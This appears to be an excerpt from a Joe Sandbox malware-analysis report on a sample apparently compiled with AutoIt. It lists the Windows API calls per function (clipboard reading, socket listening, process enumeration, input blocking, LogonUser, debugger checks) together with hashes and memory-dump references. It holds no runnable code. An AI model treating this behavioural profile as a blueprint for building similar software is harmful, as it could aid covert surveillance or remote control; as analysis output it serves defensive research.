                                                                         • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                        • String ID:
                                                                        • API String ID: 1255039815-0
                                                                        • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                        • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                        • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                        • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                        APIs
                                                                        • __swprintf.LIBCMT ref: 00433073
                                                                        • __swprintf.LIBCMT ref: 00433085
                                                                        • __wcsicoll.LIBCMT ref: 00433092
                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                        • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                        • LockResource.KERNEL32(?), ref: 00433120
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                        • String ID:
                                                                        • API String ID: 1158019794-0
                                                                        • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                        • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                        • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                        • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                        • String ID:
                                                                        • API String ID: 1737998785-0
                                                                        • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                        • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                        • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                        • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                        • GetLastError.KERNEL32 ref: 0045D6BF
                                                                        • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                        • API String ID: 4194297153-14809454
                                                                        • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                        • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                        • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                        • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove$_strncmp
                                                                        • String ID: @oH$\$^$h
                                                                        • API String ID: 2175499884-3701065813
                                                                        • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                        • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                        • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                        APIs
                                                                        • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                        • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                        Similarity
                                                                        • API ID: ErrorLast$closesocket$bindlistensocket
                                                                        • String ID:
                                                                        • API String ID: 540024437-0
                                                                        • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                        • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                        • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                        • API String ID: 0-2872873767
                                                                        • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                        • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                        • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                        • __wsplitpath.LIBCMT ref: 00475644
                                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                        • _wcscat.LIBCMT ref: 00475657
                                                                        • __wcsicoll.LIBCMT ref: 0047567B
                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                        • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                        Similarity
                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                        • String ID:
                                                                        • API String ID: 2547909840-0
                                                                        • Opcode ID: ef541357252d993a4df868a4b3766a9c4de7ab22228c2cbf8f5e37cb3d280287
                                                                        • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                        • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                        APIs
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                        • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                        • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                        • FindClose.KERNEL32(?), ref: 004525FF
                                                                        Similarity
                                                                        • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                        • String ID: *.*$\VH
                                                                        • API String ID: 2786137511-2657498754
                                                                        • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                        • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                        • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                        APIs
                                                                        • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                        • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                        Similarity
                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                        • String ID: pqI
                                                                        • API String ID: 2579439406-2459173057
                                                                        • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                        • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                        • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                        APIs
                                                                        • __wcsicoll.LIBCMT ref: 00433349
                                                                        • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                        • __wcsicoll.LIBCMT ref: 00433375
                                                                        • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                        Similarity
                                                                        • API ID: __wcsicollmouse_event
                                                                        • String ID: DOWN
                                                                        • API String ID: 1033544147-711622031
                                                                        • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                        • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                        • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                        • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                        • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                        • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                        Similarity
                                                                        • API ID: KeyboardMessagePostState$InputSend
                                                                        • String ID:
                                                                        • API String ID: 3031425849-0
                                                                        • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                        • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                        • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                        APIs
                                                                          • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                        Similarity
                                                                        • API ID: ErrorLastinet_addrsocket
                                                                        • String ID:
                                                                        • API String ID: 4170576061-0
                                                                        • Opcode ID: 8ddbfaba4c2126a023af5507e312a02ed6e7cff796df1806a9b93600bfc1e307
                                                                        • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                        • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                        APIs
                                                                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                        • IsWindowVisible.USER32 ref: 0047A368
                                                                        • IsWindowEnabled.USER32 ref: 0047A378
                                                                        • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                        • IsIconic.USER32 ref: 0047A393
                                                                        • IsZoomed.USER32 ref: 0047A3A1
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
APIs
• OpenClipboard.USER32(?), ref: 0046DCE7
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
• GetClipboardData.USER32(0000000D), ref: 0046DD01
• CloseClipboard.USER32 ref: 0046DD0D
• GlobalLock.KERNEL32(00000000), ref: 0046DD37
• CloseClipboard.USER32 ref: 0046DD41
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
• GetClipboardData.USER32(00000001), ref: 0046DD8D
• CloseClipboard.USER32 ref: 0046DD99
Similarity
• API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
• String ID:
• API String ID: 15083398-0
APIs
Strings
Similarity
• API ID: _memmove
• String ID: U$\
• API String ID: 4104443479-100911408
APIs
• FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
• FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
• FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
APIs
• GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
• FindFirstFileW.KERNEL32(?,?), ref: 004339D8
• FindClose.KERNEL32(00000000), ref: 004339EB
Similarity
• API ID: FileFind$AttributesCloseFirst
• String ID:
• API String ID: 48322524-0
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
• InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Similarity
• API ID: Internet$AvailableDataErrorFileLastQueryRead
• String ID:
• API String ID: 901099227-0
APIs
• DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
Similarity
• API ID: Proc
• String ID:
• API String ID: 2346855178-0
APIs
• BlockInput.USER32(00000001), ref: 0045A38B
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
APIs
• LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
Similarity
• API ID: LogonUser
• String ID:
• API String ID: 1244722697-0
APIs
• GetUserNameW.ADVAPI32(?,?), ref: 00472C51
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                        • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                        • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                        • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: N@
                                                                        • API String ID: 0-1509896676
                                                                        • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                        • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                        • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                        • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                        • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                        • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                        • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                        • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                        • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                        • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                        • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                        • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                        • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                        • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                        • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                        • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                        APIs
                                                                        • DeleteObject.GDI32(?), ref: 0045953B
                                                                        • DeleteObject.GDI32(?), ref: 00459551
                                                                        • DestroyWindow.USER32(?), ref: 00459563
                                                                        • GetDesktopWindow.USER32 ref: 00459581
                                                                        • GetWindowRect.USER32(00000000), ref: 00459588
                                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                        • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                        • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                        • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                        • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                        • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                        • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                        • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                        • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                        • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
